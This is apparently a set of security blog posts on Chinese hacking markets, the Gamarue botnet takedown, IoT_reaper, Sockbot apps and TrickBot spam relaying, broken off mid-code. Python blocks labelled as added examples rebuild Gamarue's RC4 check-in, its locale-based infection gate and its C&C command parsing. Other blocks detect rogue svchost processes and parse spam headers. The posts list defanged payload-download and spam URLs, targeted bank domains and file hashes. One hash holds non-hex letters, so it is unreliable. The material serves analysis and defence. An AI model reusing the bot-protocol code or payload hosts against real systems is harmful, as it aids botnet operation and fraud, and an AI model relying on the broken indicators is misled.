Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.


Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.


Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue’s sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet’s command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet’s servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue’s global prevalence.

Figure 1. Gamarue’s global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc.
  • Rootkit (included in crime kit) – Injects rootkit code into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns the victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) – Enables the attacker to remotely control the victim machine, spy on the desktop, perform file transfers, among other functions
  • Spreader – Adds the capability to spread the Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses a domain generation algorithm (DGA) for the servers from which it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue’s attack kill-chain

Gamarue’s main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it sends information such as the hard disk’s volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication of whether the signed-in user has administrative rights, and the keyboard language setting of the infected machine. This information is sent to the C&C server via HTTP in JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazakhstan

Before sending to the C&C server, this information is encrypted with RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with RC4, using the same key that encrypts the message from the infected machine. Because that key is static and embedded in the binary, anyone who extracts it from a sample can decrypt both directions of the traffic.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes – how long to wait before asking the C&C server for the next command
  • Task ID – used by the hacker to track whether there was an error performing the task
  • Command – one of the commands listed above
  • Download URL – where the plugin, updated binary, or other malware can be downloaded, depending on the command

Figure 9. Decrypted reply from C&C server
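As an added example (this code is not from the Microsoft write-up; the key, the JSON field names, the locale tags and the numeric command codes are assumptions, since the real values only appear in Figures 5 and 9 and inside the binary), the following Python implements RC4 and round-trips a constructed check-in and reply of the shape described above. The same function encrypts and decrypts, which is the property that lets an analyst holding the extracted key read the whole conversation.

```python
import json
from typing import Dict, Iterator

def rc4_keystream(key: bytes) -> Iterator[int]:
    """RC4: key-scheduling algorithm (KSA) followed by the pseudo-random generation algorithm (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                                            # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]

def rc4(key: bytes, data: bytes) -> bytes:
    """Stream cipher: XOR with the keystream, so the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)

# Assumed key: the real one is hardcoded in the Gamarue binary and must be pulled from the sample.
HARDCODED_KEY = b"assumed-gamarue-build-key"

# Keyboard layouts the bot refuses to infect; the post names the countries, the locale tags are assumed.
EXCLUDED_LAYOUTS = {"be-BY", "ru-RU", "uk-UA", "kk-KZ"}

def build_checkin(volume_serial: int, build_id: str, os_version: str,
                  local_ip: str, is_admin: bool, keyboard_layout: str) -> Dict[str, object]:
    """The fields the post says are sent at check-in; the JSON key names are assumed."""
    return {
        "id": f"{volume_serial:08X}",   # the volume serial number doubles as the bot ID
        "bid": build_id,
        "os": os_version,
        "la": local_ip,
        "rg": 1 if is_admin else 0,
        "kb": keyboard_layout,
    }

def should_infect(checkin: Dict[str, object]) -> bool:
    """The locale gate described in the post: CIS keyboard layouts are not infected further."""
    return checkin["kb"] not in EXCLUDED_LAYOUTS

def encrypt_message(key: bytes, message: Dict[str, object]) -> bytes:
    return rc4(key, json.dumps(message, separators=(",", ":")).encode())

def decrypt_message(key: bytes, blob: bytes) -> Dict[str, object]:
    return json.loads(rc4(key, blob).decode())

# Command numbering is assumed; the post lists the commands but not their numeric codes.
COMMANDS = {1: "download_exe", 2: "download_dll", 3: "install_plugin",
            4: "update_bot", 5: "delete_dlls", 6: "delete_plugins", 7: "kill_bot"}

def parse_reply(key: bytes, blob: bytes) -> Dict[str, object]:
    """Decode a C&C reply into the four fields the post describes (field names assumed)."""
    r = decrypt_message(key, blob)
    return {
        "wait_minutes": int(r["t"]),
        "task_id": int(r["tid"]),
        "command": COMMANDS.get(int(r["cmd"]), "unknown"),
        "url": r.get("url", ""),
    }
```

With a real sample, replace HARDCODED_KEY with the key pulled from the binary and feed the captured HTTP body to parse_reply; if the output is not valid JSON, either the key or the build has changed.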

Anti-sandbox techniques

Gamarue employs anti-analysis techniques to make analysis and detection difficult. Before infecting a machine, Gamarue compares hashes of the names of the processes running on the potential victim's machine against a built-in list. If it finds a process associated with malware analysis tools, such as virtual machine or sandbox components, Gamarue does not infect the machine. Older versions instead run a decoy payload when they detect that they are running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue stores and loads its plugins stealthily as well. The plugins are stored filelessly, either in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating system of infected computers by disabling the Windows Firewall, Windows Update, and User Account Control. These functions cannot be re-enabled until the Gamarue infection has been removed from the machine. This OS tampering behavior does not work on Windows 10.

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways the operators make money with Gamarue. Since Gamarue's main purpose is to distribute other malware, its operators earn through pay-per-install schemes. Using its plugins, Gamarue can also steal user information, which can be sold to other criminals in underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped between criminal groups.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary of downloading software from websites other than the program developer's.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new and never-before-seen malware in real time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections delivered by email, using built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

Microsoft Digital Crimes Unit and Windows Defender Research team

Meet IoT_reaper: The New Malware Building a Massive Botnet Army

WannaCry, Petya, the Dyn distributed denial-of-service (DDoS) attack: all now infamous cyberattacks that have defined the modern threat landscape. The latter, which was carried out by the Mirai botnet and knocked major websites offline across much of the US East Coast, occurred exactly a year ago, and now a successor has emerged. Named IoT_reaper, the new malware doesn't depend on guessing weak passwords as Mirai did; instead it exploits vulnerabilities in various Internet of Things (IoT) devices and enlists them into a botnet army.

IoT_reaper leverages a total of nine vulnerabilities, to be exact. These vulnerabilities were previously disclosed in a plethora of routers and cameras that come from popular manufacturers that produce millions of devices each year. Which means there’s potential for a DDoS attack of massive proportions. In fact, researchers believe IoT_reaper is already halfway there, and has infected nearly two million devices so far. Plus, the army is growing at a mind-boggling rate of 10,000 new devices per day. For reference, it took only 100,000 infected devices for Mirai to flood the internet with traffic and take down DNS provider Dyn last year.

Clearly, it’s crucial users start thinking now about how they can prevent their IoT devices from becoming enslaved into IoT_reaper’s botnet army. To do just that, follow these tips:

  • Keep security top of mind when buying an IoT device. When you're thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the security track record of the device in question. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Update your router's firmware. Fortunately, many of the affected devices have patches available, so it's important to update your firmware immediately if you haven't already, as fixes are typically included within each update.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Meet IoT_reaper: The New Malware Building a Massive Botnet Army appeared first on McAfee Blogs.

Infected Minecraft Apps Could Potentially Turn Over 2 Million Android Devices Into a Botnet Army

We all love a good game, especially those that allow us to create and innovate with the touch of our fingertips. That’s why the video game Minecraft, which allows players to build constructions out of textured cubes, has grown in popularity. It’s become so popular, in fact, that there’s even mobile app versions of the game.

And now malicious versions of these apps exist too. Just this week, cybersecurity researchers discovered Minecraft Android apps in the Google Play store that have been infected with Sockbot malware. These eight apps have been designed to enslave the devices that download them into a botnet army, and have impacted almost 2.6 million devices already.

These apps managed to sneak their way onto Google Play through the art of deception. Basically, the infected apps posed as add-on functionality for the popular Minecraft: Pocket Edition (PE) game. They are not official Minecraft apps but instead offer “skins” which can be used to modify the appearance of in-game characters.

Once downloaded, however, the apps' true intentions come out. At first, it was thought that the apps were simply aimed at generating illegitimate ad revenue: some were found connecting to a command-and-control (C&C) server that supplied them with a list of ads and metadata for launching ad requests. But instead of just serving ads, Sockbot turned each device into a SOCKS proxy, a relay that forwards arbitrary network connections on behalf of a remote client, which lets the operators route traffic through victims' devices and use them as a botnet. So far it has recruited quite a few soldiers: 2.6 million devices have reportedly been hit already.

Fortunately, these apps have been flagged to Google, who quickly removed them from their official app store. However, with millions of devices already impacted, it’s important Android users keep these tips in mind:

  • Only download apps from the original developer. As fun as it is to enhance your game, you should only download add-ons and alternative apps that have been created by the original developer. In the case of Sockbot malware, Android users could’ve avoided infection if they only downloaded applications from the makers of Minecraft themselves.
  • Do your homework. Before you download an app, make sure you head to the reviews section of an app store first. Take the time to sift through the reviews, and keep an eye out for ones that mention that the app has had issues with security or might be a bit sketchy. It helps to research the developer too. When in doubt, don't download any app that is remotely questionable.
  • Use a mobile security solution. As malware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.


The post Infected Minecraft Apps Could Potentially Turn Over 2 Million Android Devices Into a Botnet Army appeared first on McAfee Blogs.

TrickBot’s New Magic Trick: Sending Spam


It has been a while since we had a blog from Arsh Arora, who is pursuing his Ph.D., which has kept him away from blogging for a bit. With his current focus on analyzing Banking Trojans and Ransomware, he came across something this weekend that was too interesting not to share!  Take it away, Arsh!

A couple of weeks ago, Gary (the boss) asked me to look into TrickBot samples as they are known to extract Outlook credentials (malwarebytes blog) and he needed confirmation. I ran the samples through Cuckoo sandbox but couldn’t gather much information because of the short run time.  As is often the case, many malware samples don't show their full capabilities without informed human interaction.  Therefore, I moved on to my favorite thing “Double click and wait for the magic.”

First Stage – Extracting the Config File

During the first run, Clifford Wilson, a new malware researcher in our lab, helped in extracting some valuable indicators. In the initial stage, we found out that when testing the TrickBot binary:

Original binary hash – 0c9b1b5ce3731bf8dbfe10432b1f0c2ff48d3ccdad6a28a6783d109b1bc07183
Downloaded binary hash - ce806899fc6ef39a6f9f256g4dg3d568e46696c8306ef8ge96f348g9a68g6660

The original binary launches a child process and then it gets replaced by a different binary that is downloaded. The downloaded binary launches a child process and the TrickBot sample gets activated after these steps.

While analyzing the sample we observed that it launches several svchost.exe instances; the number varies from four to seven depending on how long the sample runs.


Fig. 1: TrickBot binary with "svchost.exe"

Each of the svchost instances has its own significance:

Svchost 1: Appears to be used to search for and receive certificates

Svchost 2: Contains strings referring to 127 different financial institutions (the complete list is below)

Svchost 3: Collects data from Outlook\Profiles such as usernames, passwords, servers, and ports

Fig. 2: Outlook exfiltration

Svchost 4: Scans the internet history to search for stored credentials

Svchost 5: Contains a list of random email addresses; research is ongoing to understand their use

Confirmation of Svchost being launched by TrickBot binary

To confirm our hypothesis that the various svchost instances are launched by a single process rather than by several, we tested a different binary and found the results to be identical. We used Process Monitor to confirm the creation of the svchost.exe instances by the same parent process.

Fig. 3: Svchost Create Process
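The parent-process confirmation above is worth turning into a repeatable check. The example below is added here and is not the UAB lab's tooling; the process-creation records are constructed to resemble a Process Monitor or Sysmon event log and are not from the capture. On Windows, service hosts are started by services.exe, so a svchost.exe whose parent is anything else (here the dropped binary), or whose image lives outside System32, is exactly the pattern in Fig. 3.

```python
from dataclasses import dataclass
from typing import Dict, List

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str  # full image path as logged by Process Monitor or Sysmon event ID 1

# Constructed process-creation records shaped like the run described above (not the real capture).
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(4, 0, "System"),
    ProcEvent(600, 4, r"C:\Windows\System32\services.exe"),
    ProcEvent(800, 600, r"C:\Windows\System32\svchost.exe"),                 # normal service host
    ProcEvent(2000, 1200, r"C:\Windows\explorer.exe"),
    ProcEvent(1500, 2000, r"C:\Users\lab\Desktop\sample.exe"),               # original TrickBot binary
    ProcEvent(1520, 1500, r"C:\Users\lab\AppData\Roaming\winapp\setup.exe"), # downloaded replacement
    ProcEvent(1600, 1520, r"C:\Windows\System32\svchost.exe"),               # hosts spawned by the trojan
    ProcEvent(1604, 1520, r"C:\Windows\System32\svchost.exe"),
    ProcEvent(1608, 1520, r"C:\Users\lab\AppData\Local\Temp\svchost.exe"),   # wrong location as well
]

SYSTEM32 = "c:\\windows\\system32\\"

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_suspicious_svchost(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Flag svchost.exe instances not started by services.exe or not living in System32."""
    by_pid = {e.pid: e for e in events}
    findings: List[Dict[str, object]] = []
    for e in events:
        if _basename(e.image) != "svchost.exe":
            continue
        parent = by_pid.get(e.ppid)
        parent_name = _basename(parent.image) if parent else "<not in log>"
        reasons = []
        if parent_name != "services.exe":
            reasons.append(f"parent is {parent_name}, not services.exe")
        if not e.image.lower().startswith(SYSTEM32):
            reasons.append("image is outside System32")
        if reasons:
            findings.append({
                "pid": e.pid,
                "image": e.image,
                "parent_pid": e.ppid,
                "parent_image": parent.image if parent else "",
                "reasons": reasons,
            })
    return findings

def svchost_count_by_parent(events: List[ProcEvent]) -> Dict[int, int]:
    """How many svchost.exe children each parent spawned; the trojan shows up as an outlier."""
    counts: Dict[int, int] = {}
    for e in events:
        if _basename(e.image) == "svchost.exe":
            counts[e.ppid] = counts.get(e.ppid, 0) + 1
    return counts
```

Run it over a Sysmon or Process Monitor export converted to ProcEvent records; in production, tune the parent check with a short allowlist for the few legitimate non-services.exe parents your environment actually shows, rather than loosening the rule itself.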


Config File : Svchost 2

adelaidebank[.]com[.]au
anzdirect[.]co[.]nz
anztransactive[.]anz[.]com
arabbank[.]com[.]au
asb[.]co[.]nz
bankcoop[.]ch
bankleumi[.]co[.]uk
bankline[.]natwest[.]com
bankline[.]rbs[.]com
bankofireland[.]com
bankofmelbourne[.]com[.]au
bankofscotland[.]co[.]uk
banksa[.]com[.]au
banksyd[.]com[.]au
bankwest[.]com[.]au
barclays[.]co[.]uk
barclays[.]com
barclayswealth[.]com
bcv[.]ch
bendigobank[.]com[.]au
beyondbank[.]com[.]au
bibplus[.]uobgroup[.]com
bizchannel[.]cimb[.]com
bmo[.]com
bmoharris[.]com
bnz[.]co[.]nz
boi-bol[.]com
boqspecialist[.]com[.]au
business[.]hsbc[.]co
cams[.]scotiabank[.]com
cibc[.]com
citibank[.]com[.]sg
citibusiness[.]citibank[.]com
coinbase[.]com
co-operativebank[.]co[.]uk
corp[.]westpac[.]co
corp[.]westpac[.]com
corpnet[.]lu
coutts[.]com
cua[.]com[.]au
danskebank[.]ie
defencebank[.]com[.]au
dev[.]bmo[.]com
ebanking[.]hsbc[.]co
ebanking[.]zugerkb[.]ch
fidunet[.]lu
flexipurchase[.]com
greater[.]com[.]au
gtb[.]unicredit[.]eu
harrisbank[.]com
heartland[.]co[.]nz
hsbc[.]com[.]au
humebank[.]com[.]au
hypovereinsbank[.]de
ib[.]boq[.]com
ib[.]kiwibank[.]co
icicibank[.]com
imb[.]com[.]au
internationalmoneytransfers[.]com[.]au
iombankibanking[.]com
kbc[.]ie
lloydsbank[.]co[.]uk
lloydsbank[.]com
lukb[.]ch
macquarie[.]com[.]au
maybank[.]com[.]sg
mebank[.]com[.]au
metrobankonline[.]co[.]uk
my[.]commbiz[.]commbank[.]au
mystate[.]com[.]au
nab[.]com[.]au
nationwide[.]co[.]uk
navyfederal[.]org
netteller[.]com[.]
newcastlepermanent[.]com[.]au
nwolb[.]com
ocbc[.]com
online[.]anz[.]com
online[.]lloydsbank[.]com
onlinebanking[.]iombank[.]com
onlinesbiglobal[.]com
postfinance[.]ch
qtmb[.]com[.]au
rabobank[.]co[.]nz
rabobank[.]com[.]au
rabodirect[.]co[.]nz
rabodirect[.]com[.]au
raiffeisendirect[.]ch
rbc[.]com
rbsdigital[.]com
rbsiibanking[.]com
ruralbank[.]com[.]au
salesforce[.]com
santander[.]co[.]uk
sbisyd[.]com[.]au
sbs[.]net[.]nz
scotiabank[.]com
secure[.]societegenerale[.]fr
secure[.]wellsfargo[.]com
standardchartered[.]com
standardchartered[.]com[.]sg
stgeorge[.]com[.]au
suncorpbank[.]com[.]au
tdcommercialbanking[.]com
tmbank[.]com[.]au
tsb[.]co[.]uk
tsbbank[.]co[.]nz
tsw[.]com[.]au
ubank[.]com[.]au
ubs[.]com
ulsterbankanytimebanking[.]co[.]uk
ulsterbankanytimebanking[.]ie
unicredit[.]it
unicreditbank[.]ba
unicreditbank[.]lu
unicreditbank[.]sk
unicreditbanking[.]net
unicreditcorporate[.]it
uobgroup[.]com
valiant[.]ch
wellsfargo[.]com
westpac[.]co[.]nz
westpac[.]com[.]au

This is the comprehensive list of all the unique financial institutions referenced in Svchost 2, and it is safe to assume that this TrickBot build targets these institutions. We have observed that some of the brands receive quite sophisticated web injects, prompting for credit card number, date of birth, or mother's maiden name, which is then sent to the criminals.

The binary creates a folder 'winapp' under Roaming and stores all the files in that location, which is covered in the MalwareBytes blog. If your institution is here and you need more information about the inject script, contact us.

An update to the Malwarebytes findings: the sample now downloads an executable named "Setup.exe" under WinApp. The interesting thing about the executable is that it is downloaded as a .png and then converted into an .exe. The URLs from which the executable is downloaded are:



http://www[.]aharonwheelsbolsta[.]com/worming[.]png
http://www[.]aharonwheelsbolsta[.]com/toler[.]png

Fig. 4: File being downloaded as Png

Fig. 5: Downloaded Executable
These downloaded files are also the TrickBot binary.

Fig. 6: Setup.exe under WinApp
The downloaded files are converted into "Setup.exe" and can be found under the Roaming\WinApp directory.

Second Stage - Spam aka 'Pill Spam'

After the initial analysis, a strange pattern appeared when we examined the Wireshark traffic with the 'imf' display filter. Our machine (10.0.2.15) was acting both as a mail sender and as a proxy: it relayed messages coming from 208.84.244.139 (a mail server hosted by Terra Network Operations in Coral Gables, Florida) and 82.208.6.144 (a mail server in Prague, Czech Republic), and it was also sending outbound spam of its own.

Fig. 7: Wireshark capture with IMF filter


Outbound Spam

As can be seen in Figure 7, the top three spam messages are outbound and are being sent from our machine. There were six different spam messages in total, each with a different subject line and link. One of the emails is shown below:

Fig. 8: Email message

Some of the subjects and URLs that were spammed:

Subject                                  URL
Affordable-priced Brand Pilules          http://martinagebhardt[.]hu/w/1gox[.]php
Blue Pills easy-ordering                 http://host[.]teignmouthfolk[.]co[.]uk/w/zxaj[.]php
Eromedications Wholesale                 http://martinagebhardt[.]hu/w/1pyo[.]php
Great offers on Male Pills               http://host[.]bhannu[.]com/w/w10x[.]php
Here we sell Branded tablets             http://host[.]selfcateringintenerife[.]co[.]uk/w/l5fz[.]php
Online offers Branded pharmacueticals    http://host[.]iceskatemag[.]co[.]uk/w/lztg[.]php

When we visited these links, they redirected to a counterfeit pill website featuring pain and anxiety medications such as Xanax, Tramadol, Ambien, Phentermine, and more. A screenshot of the pill website, with the affiliate ID in the URL, is shown below.


Fig. 9: Redirect to a pill website with aff id

When we examined these links individually, each host served a set of PHP files under the 'w' directory. Walking the tree up to the bare domain led to a dating/porn website.

Inbound Spam

As can be seen in Figure 7, there is a significant amount of inbound traffic consisting of different spam messages relayed through our machine. It can be inferred that our machine is being used as a proxy to hinder tracing and detection. A number of different domains appeared in the "From" addresses of these messages. An example of one such message is:

From: Walmart
Reply-To: newsletters@walmart.com
To: Grazielle
Subject: =?UTF-8?Q?Huge_Clearance_savings_you_can=E2=80=99t_miss?=
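The Subject line above is RFC 2047 encoded, which is why it appears as =?UTF-8?Q?…?= in the capture. The following added example (not part of Arsh's post) parses messages built from the headers shown, decodes the subject and sender display name, and collects the sender domains, which is how a list like the one that follows can be produced from a capture. The sender addresses, the recipient address, the second message and the bodies are constructed for the example.

```python
from email import message_from_bytes, policy
from typing import Dict, List

# Constructed raw messages modelled on the headers quoted above. The sender addresses, the
# recipient address, the second message and the bodies are made up for the example.
WALMART_MSG = b"""From: Walmart <newsletters@walmart.com>
Reply-To: newsletters@walmart.com
To: Grazielle <grazielle@example.invalid>
Subject: =?UTF-8?Q?Huge_Clearance_savings_you_can=E2=80=99t_miss?=
Content-Type: text/plain; charset=utf-8

(body omitted)
"""

DOMINOS_MSG = b"""From: =?UTF-8?B?RG9taW5vJ3M=?= <offers@offers.dominos.com>
Reply-To: bounce@example.invalid
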